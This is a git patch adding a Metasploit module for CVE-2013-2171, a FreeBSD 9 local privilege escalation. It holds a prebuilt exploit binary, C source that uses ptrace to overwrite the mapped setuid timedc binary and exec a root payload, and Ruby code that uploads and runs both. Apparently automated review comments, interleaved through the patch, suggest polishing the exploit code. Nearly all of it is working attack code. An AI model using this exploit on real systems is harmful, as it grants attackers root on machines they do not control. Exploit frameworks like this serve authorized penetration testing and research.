From 6780566a549c986304c4df49691a61e31030763c Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 24 Jun 2013 11:50:21 -0500 Subject: [PATCH] Add CVE-2013-2171: FreeBSD 9 Address Space Manipulation Module --- data/exploits/CVE-2013-2171.bin | Bin 0 -> 6193 bytes .../source/exploits/CVE-2013-2171/exploit.c | 54 +++++++++ modules/exploits/freebsd/local/mmap.rb | 111 ++++++++++++++++++ 3 files changed, 165 insertions(+) create mode 100755 data/exploits/CVE-2013-2171.bin create mode 100644 external/source/exploits/CVE-2013-2171/exploit.c create mode 100644 modules/exploits/freebsd/local/mmap.rb 
diff --git a/data/exploits/CVE-2013-2171.bin b/data/exploits/CVE-2013-2171.bin new file mode 100755 index 0000000000000000000000000000000000000000..24177a25817dad0e85c5b3e319abb395a88f7863 GIT binary patch literal 6193 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 literal 0 HcmV?d00001 diff --git a/external/source/exploits/CVE-2013-2171/exploit.c b/external/source/exploits/CVE-2013-2171/exploit.c new file mode 100644 index 0000000000..b4c027a39b --- /dev/null +++ b/external/source/exploits/CVE-2013-2171/exploit.c @@ -0,0 +1,54 @@ +#include +#include +#include +#include +#include +#include +#include + +#define TG "/usr/sbin/timedc" + +/* +This is based on Hunger's PoC +*/ +int main(int ac, char **av) { + int from_fd, to_fd, status; + struct stat st; + struct ptrace_io_desc piod; + char *s, *d; + int pid; + char *bin = "/tmp/W00T"; // "W00T" is just a place holder + + if (geteuid() == 0) { + setuid(0); + execl(bin, bin, NULL); + return 0; + } + + from_fd = open(av[0], O_RDONLY); + to_fd = open(TG, O_RDONLY); + if ( from_fd == -1 || to_fd == -1 ) return 0; + if (stat(av[0], &st) == -1) return 0; + + s = mmap(NULL, (size_t)st.st_size, PROT_READ, MAP_SHARED, from_fd, (off_t)0); + d = mmap(NULL, (size_t)st.st_size, PROT_READ, MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0); + + if (s == MAP_FAILED || d == MAP_FAILED) return 0; + if ((pid = fork()) == -1) return 0; + if (!pid) { + if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1) return 0; + } + + if (ptrace(PT_ATTACH, pid, NULL, 0) == -1) return 0; + if (wait(&status) == -1) return 0; + + piod.piod_op = PIOD_WRITE_D; + piod.piod_offs = d; + piod.piod_addr = s; + piod.piod_len = st.st_size; + + if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1) return 0; + execl(TG, TG, NULL); + + return 0; +} diff --git a/modules/exploits/freebsd/local/mmap.rb b/modules/exploits/freebsd/local/mmap.rb new file mode 100644 index 0000000000..ef08e6ea2f --- /dev/null +++ b/modules/exploits/freebsd/local/mmap.rb 
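Review bot: The only documentation in exploit.c is `This is based on Hunger's PoC`, yet the file is the source of the prebuilt data/exploits/CVE-2013-2171.bin that the Ruby module patches in place, so the header comment should record that relationship and the constraint it imposes on the `bin` string: the `W00T` placeholder in `"/tmp/W00T"` must stay exactly four bytes, because mmap.rb substitutes a four-character name into the binary with `gsub` and a different length would shift the rest of the ELF. A header such as `/* CVE-2013-2171 (FreeBSD-SA-13:06.mmap). Built into data/exploits/CVE-2013-2171.bin; mmap.rb rewrites the 4-byte "W00T" placeholder in place, so keep its length. */` would make that explicit for whoever rebuilds the binary. The `#include` lines also appear with no header names in this rendering, presumably because the angle-bracketed names were lost on extraction; worth confirming the committed file still has them.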
@@ -0,0 +1,111 @@
+##
+ # This file is part of the Metasploit Framework and may be subject to
+ # redistribution and commercial restrictions. Please see the Metasploit
+ # web site for more information on licensing and terms of use.
+ # http://metasploit.com/
+ ##
+
+ require 'msf/core'
+
+ class Metasploit4 < Msf::Exploit::Local
+ Rank = GreatRanking
+
+ include Msf::Exploit::EXE
+ include Msf::Post::Common
+
+ def initialize(info={})
+ super( update_info( info, {
+ 'Name' => 'FreeBSD 9 Address Space Manipulation Privilege Escalation',
+ 'Description' => %q{
+ This module exploits a vulnerability that can be used to modify portions of
+ a process's address space, which may lead to privilege escalation. Systems
+ such as FreeBSD 9.0 and 9.1 are known to be vulnerable.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Konstantin Belousov', # Discovery
+ 'Alan Cox', # Discovery
+ 'Hunger', # POC
+ 'sinn3r' # Metasploit
+ ],
+ 'Platform' => [ 'bsd' ],
+ 'Arch' => [ ARCH_X86 ],
+ 'SessionTypes' => [ 'shell' ],
+ 'References' =>
+ [
+ [ 'CVE', '2013-2171' ],
+ [ 'OSVDB', '94414' ],
+ [ 'EDB', '26368' ],
+ [ 'BID', '60615' ],
+ [ 'URL', 'http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc' ]
+ ],
+ 'Targets' =>
+ [
+ [ 'FreeBSD x86', {} ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => "Jun 18 2013",
+ }
+ ))
+ end
+
+ def write_file(data, fname)
+ oct_data = "\\" + data.unpack("C*").collect {|e| e.to_s(8)} * "\\"
+ session.shell_command_token("printf \"#{oct_data}\" > #{fname}")
+ session.shell_command_token("chmod +x #{fname}")
+
+ chk = session.shell_command_token("file #{fname}")
+ return (chk =~ /ERROR: cannot open/) ? false : true
+ end
+
+ def upload_payload
+ fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
+ p = generate_payload_exe
+ f = write_file(p, fname)
+ return nil if not f
+ fname
+ end
+
+ def generate_exploit(payload_fname)
+ #
+ # Metasm does not support FreeBSD executable generation.
+ #
+ path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin")
+ f = File.open(path, 'rb')
+ x = f.read(f.stat.size)
+ f.close
+
+ x.gsub(/W00T/, File.basename(payload_fname))
+ end
+
+ def upload_exploit(payload_fname)
+ fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
+ bin = generate_exploit(payload_fname)
+ f = write_file(bin, fname)
+ return nil if not f
+ fname
+ end
+
+ def on_new_session(cli)
+ print_warning("Removing #{@payload_fname}")
+ cli.shell_command_token("rm #{@payload_fname}")
+
+ print_warning("Removing #{@exploit_fname}")
+ cli.shell_command_token("rm #{@exploit_fname}")
+ end
+
+ def exploit
+ @payload_fname = upload_payload
+ fail_with(Exploit::Failure::NotFound, "Payload failed to upload") if @payload_fname.nil?
+ print_status("Payload #{@payload_fname} uploaded.")
+
+ @exploit_fname = upload_exploit(@payload_fname)
+ fail_with(Exploit::Failure::NotFound, "Exploit failed to upload") if @exploit_fname.nil?
+ print_status("Exploit #{@exploit_fname} uploaded.")
+
+ print_status("Executing #{@exploit_fname}")
+ cmd_exec(@exploit_fname)
+ end
+
+end
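Review bot: In `generate_exploit` the template is opened with `File.open(path, 'rb')` and closed by hand, so an exception from `f.read` leaks the handle; `x = File.binread(path)` reads the whole file and closes it on every path, and the `f.stat.size` call goes away with it. The `x.gsub(/W00T/, File.basename(payload_fname))` that follows silently relies on the replacement being exactly four bytes like the placeholder, which holds only because `upload_payload` uses `Rex::Text.rand_text_alpha(4)`; a comment such as `# replacement must be 4 bytes so the ELF layout is unchanged` and a guard `raise ArgumentError, "payload name must be 4 bytes" unless File.basename(payload_fname).bytesize == 4` would keep that contract from breaking on a later edit. In `write_file`, `return (chk =~ /ERROR: cannot open/) ? false : true` only detects a missing file, not a truncated write, and reads more plainly as `chk !~ /ERROR: cannot open/`; likewise `return nil if not f` in the two upload helpers is `return nil unless f` in idiomatic Ruby.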